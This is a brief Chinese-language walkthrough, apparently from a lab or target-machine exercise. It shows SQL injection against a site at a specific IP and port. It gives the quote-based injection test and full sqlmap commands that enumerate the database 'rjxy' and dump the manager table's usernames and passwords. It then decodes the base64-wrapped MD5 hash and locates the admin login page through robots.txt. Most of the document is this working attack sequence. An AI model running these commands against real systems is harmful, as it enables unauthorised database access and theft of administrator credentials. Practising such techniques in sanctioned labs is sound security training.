一.寻找目标网站的注入点(靶机实战)
寻找注入点,随机点击一篇文章
url :http://117.167.136.244:28026/index/narticle.php?nid=3099
sql注入测试:http://117.167.136.244:28026/index/narticle.php?nid=3099’
确定存在注入
二.使用sqlmap
- sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs
- sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -D rjxy -tables
- sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -D rjxy -T manager -columns
- sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -D rjxy -T manager -C password,username,uid -dump
三.密码破解
密码有加密
ZGM2M2VlMmUyYTE2M2Q0NmE3MGFiNDRhNzUxYzBkMjA=
猜测base64加密,然后解密得
dc63ee2e2a163d46a70ab44a751c0d20
总共有32位字母和数字,猜测md5加密
四.登录后台
访问http://117.167.136.244:28026/robots.txt
http://117.167.136.244:28026/admins/login.php